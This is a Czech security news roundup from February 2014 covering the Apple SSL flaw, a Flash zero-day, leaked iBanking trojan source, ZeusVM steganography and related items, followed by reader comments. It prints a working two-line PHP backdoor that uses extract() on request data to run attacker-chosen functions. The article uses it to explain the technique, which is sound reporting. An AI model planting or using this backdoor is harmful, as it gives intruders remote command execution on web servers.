Hlavní navigace

Postřehy z bezpečnosti: kritické aktualizace, o kterých byste měli vědět

Martin Čmelík 24. 2. 2014

V dnešním díle Postřehů se podíváme na kritickou chybu iOS zařízení a OS X systému, 0day chybu v Adobe Flash, informaci o potřebě aktualizovat i HW v našich domácnostech, komu dal Microsoft 100 tisíc dolarů, novou variantu bankovního trojana Zeus, novou formu PHP backdooru, podivné výběrové řízení FBI a mnoho dalšího.

Byla vydána aktualizace pro všechna iOS zařízení 7.0.6 a 6.1.6 opravující kritickou chybu (CVE-2014–1266) při zpracování SSL/TLS spojení umožňující převzít jakékoliv šifrované spojení mezi klientem a serverem. Adam Langley na svém webu podrobně popisuje chybu včetně ukázky chybného kódu. Tato chyba zřejmě postihuje i OS X do verze 10.9.1 a opravné balíčky pro OS X již byly uvolněny (použijte App Store pro ověření). Pokud dokážete navštívit tuto testovací stránku pomocí Safari, tak je váš systém napadnutelný.

Pokročilý bankovní trojský kůň pro Android zařízení s názvem iBanking, o kterém jsme informovali již dříve, je teď mnohem větší hrozbou. Byly volně ke stažení jeho zdrojové kódy serverové části obsahující i modul pro sestavení mobilního klienta. Připomeňme, že tento malware má schopnost odposlouchávat SMS zprávy, kterými se většinou zasílá autentizační kód pro přístup k vašemu bankovnímu účtu.

Tým lidí ze společnosti FireEye objevil další 0day chybu v Adobe Flash postihující všechny jeho současné verze/větve. Bohužel byl tento exploit již spatřen na několika webech a je tak více než doporučeno ihned aktualizovat na poslední verzi.

Pokud chcete vědět, jaké všechny komponenty, knihovny či aplikace na vašem počítači obsahují bezpečnostní chybu a je potřeba je aktualizovat, doporučuji používat Secunia PSI.

Facebook koupil společnost WhatsApp za 19 miliard dolarů. Více než o aplikaci šlo samozřejmě o její komunitu čítající 450 milionů uživatelů (jejich údajů a čísel). Jednoduchým počtem dojdeme k tomu, že Facebook odhadl cenu jednoho uživatele na 42 dolarů. Pro bezpečné zasílání zpráv byste však měli používat spíše TextSecure nebo Threema.

Brian Krebs na svém webu popisuje důležitost aktualizací nejen vašeho počítače, ale také všech vašich zařízení komunikujících se sítí (televize, HTPC, WiFi router, ledničky, …). Je známo, že spousta automatizovaných botů hledá právě takováto zařízení a ihned se snaží využít známých slabin, aby se pak i toto zařízení stalo součástí botnetu. Jeden z botnetů tvořený právě těmito zařízeními čítal sto tisíc.

Microsoft minulý rok spustil bug bounty program zaměřený jen na obcházení ochran ASLR (Address Space Layout Randomization) a DEP (Data Execution Prevention). Již minulý rok měl Yang Yu prezentaci na CanSecWest popisující obcházení ASLR a DEPu bez ROP (Return Oriented Programming), což je nejběžnější postup. Jako poslední také dostal 100 000 dolarů tímto bug bounty programem, když zaslal tři různé vzorky kódu obcházející sandbox. Na tomto webu se můžete podívat, kolik různých bug bounty programů existuje.

Jedna z variant bankovního trojana Zeus, zvaná ZeusVM, používá steganografii, kdy je seznam bank, na které se má zaměřit, uložen v obrázku.

Google koupil startup SlickLogin používající dvoufaktorovou autentizaci zajímavým způsobem. Pro přihlášení do systému či aplikace použijete aplikaci na svém mobilu, která začne vysílat kód na vyšší frekvenci (neslyšitelné lidským sluchem) a tím se tak uživatel úspěšně ověří. Podobně jako si BadBIOS měl vyměňovat data mezi počítači. Pokud váš počítač nemá mikrofon, tak je možné použít i NFC, Bluetooth, WiFi nebo QR kódy. Zajímavé řešení.

Nová forma PHP backdooru chytře využívá možností funkce extract() ke spuštění systémových příkazů, čímž se zcela vyhýbá klasickým funkcím, jako je system, eval, passthru apod.

@extract ($_REQUEST);
@die ($ctime($atime));

FBI vypsala výběrové řízení na obří skladiště malware. Cílem je mít co možná nejširší a nejaktuálnější seznamy malwaru potulujícího se po internetu. Nad tímto skladem by následně měla být vybudována laboratoř pro výzkum bezpečnostních hrozeb. FBI přitom není žádný břídil a chce mít opravdu vše – od hrozeb pro Windows počínaje, přes Linux až po javascriptové a PHP technologie. Třeba NSA pošle i zdrojové kódy :)

Článek sice staršího data, ale o to kvalitnější. Jedná se o popis první chyby v Internet Explorer 11 64-bit na Windows 8.1. Rozhodně by neměl uniknout žádnému bug-hunterovi.

Nekomerční konference Security Session má to potěšení pozvat všechny zájemce 5. dubna (sobota) na další ročník. V této chvíli sestavujeme program konference a přednášek a chtěli bychom takto i požádat čtenáře PzB, aby nás kontaktovali na info (zavináč) security-session.cz pokud by měl někdo zájem přednášet na konferenci. Budeme se těšit!

Ve zkratce

Pro pobavení

The NSA is the only branch of the government that actually listens to people.

Závěr

Tento seriál vychází střídavě za pomoci konzultantů firmy Datasys, příznivců a redaktorů serveru Security-Portal.cz. Uvítali bychom i vaši spolupráci na tvorbě obsahu tohoto seriálu. Pokud byste nás chtěli upozornit na zajímavý článek, tak nám napište na FB stránku, případně na Twitter. Děkujeme.

Našli jste v článku chybu?

27. 2. 2014 22:15

Použití steganografie v bankovním malwaru se dalo očekávat, vizte 2. díl série “Na obzoru se objevují nové hrozby, třeste se!”. Naštěstí se ale jedná o tu primitivnější implementaci steganografie, takže to, že obrázek obsahuje nějaká data navíc, se dá snadno odhalit právě díky výrazně větší velikosti původního obrázku. Když se tak ale koukám na ty poslední verze crimewaru, tak si říkám, že pokud se bude nadále vyvíjet stejným tempem, tak se máme opravdu na co těšit.

26. 2. 2014 19:34

Hm, FBI urcite jde pouze o vyzkum bezpecnostnich hrozeb.

Podnikatel.cz: Vrátí zvýhodnění, ale výrazně omezí paušály

Vrátí zvýhodnění, ale výrazně omezí paušály

Podnikatel.cz: Víme první výsledky doby odezvy #EET

Víme první výsledky doby odezvy #EET

Lupa.cz: Google měl výpadek, nejel Gmail ani YouTube

Google měl výpadek, nejel Gmail ani YouTube

Podnikatel.cz: Přehledná titulka, průvodci, responzivita

Přehledná titulka, průvodci, responzivita

Podnikatel.cz: EET: Totálně nezvládli metodologii projektu

EET: Totálně nezvládli metodologii projektu

Měšec.cz: Kdy vám stát dá na stěhování 50 000 Kč?

Kdy vám stát dá na stěhování 50 000 Kč?

Vitalia.cz: Chtějí si léčit kvasinky. Lék je jen v Německu

Chtějí si léčit kvasinky. Lék je jen v Německu

DigiZone.cz: Rádio Šlágr má licenci pro digi vysílání

Rádio Šlágr má licenci pro digi vysílání

Měšec.cz: Air Bank zruší TOP3 garanci a zdražuje kurzy

Air Bank zruší TOP3 garanci a zdražuje kurzy

Vitalia.cz: Láska na vozíku: Přitažliví jsme pro tzv. pečovatelky

Láska na vozíku: Přitažliví jsme pro tzv. pečovatelky

Měšec.cz: Finančním poradcům hrozí vracení provizí

Finančním poradcům hrozí vracení provizí

Podnikatel.cz: Na poslední chvíli šokuje výjimkami v EET

Na poslední chvíli šokuje výjimkami v EET

Root.cz: Vypadl Google a rozbilo se toho hodně

Vypadl Google a rozbilo se toho hodně

DigiZone.cz: Recenze Westworld: zavraždit a...

Recenze Westworld: zavraždit a...

Podnikatel.cz: Babiše přesvědčila 89letá podnikatelka?!

Babiše přesvědčila 89letá podnikatelka?!

DigiZone.cz: ČRa DVB-T2 ověřeno: Hisense a Sencor

ČRa DVB-T2 ověřeno: Hisense a Sencor

Lupa.cz: Seznam mění vedení. Pavel Zima v čele končí

Seznam mění vedení. Pavel Zima v čele končí

120na80.cz: Pánové, pečujte o svoje přirození a prostatu

Pánové, pečujte o svoje přirození a prostatu

DigiZone.cz: Sony KD-55XD8005 s Android 6.0

Sony KD-55XD8005 s Android 6.0

Vitalia.cz: Dáte si jahody s plísní?

Dáte si jahody s plísní?